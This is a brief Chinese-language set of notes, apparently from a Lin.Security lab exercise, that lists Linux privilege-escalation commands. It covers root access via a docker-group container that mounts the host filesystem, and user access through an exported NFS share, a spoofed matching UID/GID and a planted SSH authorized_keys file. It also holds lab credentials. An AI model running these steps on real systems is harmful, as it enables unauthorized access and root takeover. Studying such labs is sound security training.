linux提权-msf提权插件编写中

bob / secret

docker组提权

docker run -v /:/linsecurity -i -t chrisfosterelli/rootplease

nsf提权

查看并挂载目录
showmount -e 192.168.1.140
mount 192.168.1.140:/home/peter /mnt/peter

查看权限
ls -la /mnt/peter
touch this-wont-work

添加用户组和用户
groupadd --gid 1005 peter
useradd --uid 1001 --gid 1005 peter
su peter
pwd
touch this-will-work
ls -la

生成私钥
ssh-keygen
mkdir .ssh
ls -la /home/peter/.ssh
cat /home/peter/.ssh/id_rsa.pub > .ssh/authorized_keys

获得普通用户权限
ssh peter@192.168.1.140
whoami;id

参考资料

• https://s1gh.sh/lin-security/

• https://book.hacktricks.xyz/pentesting-methodology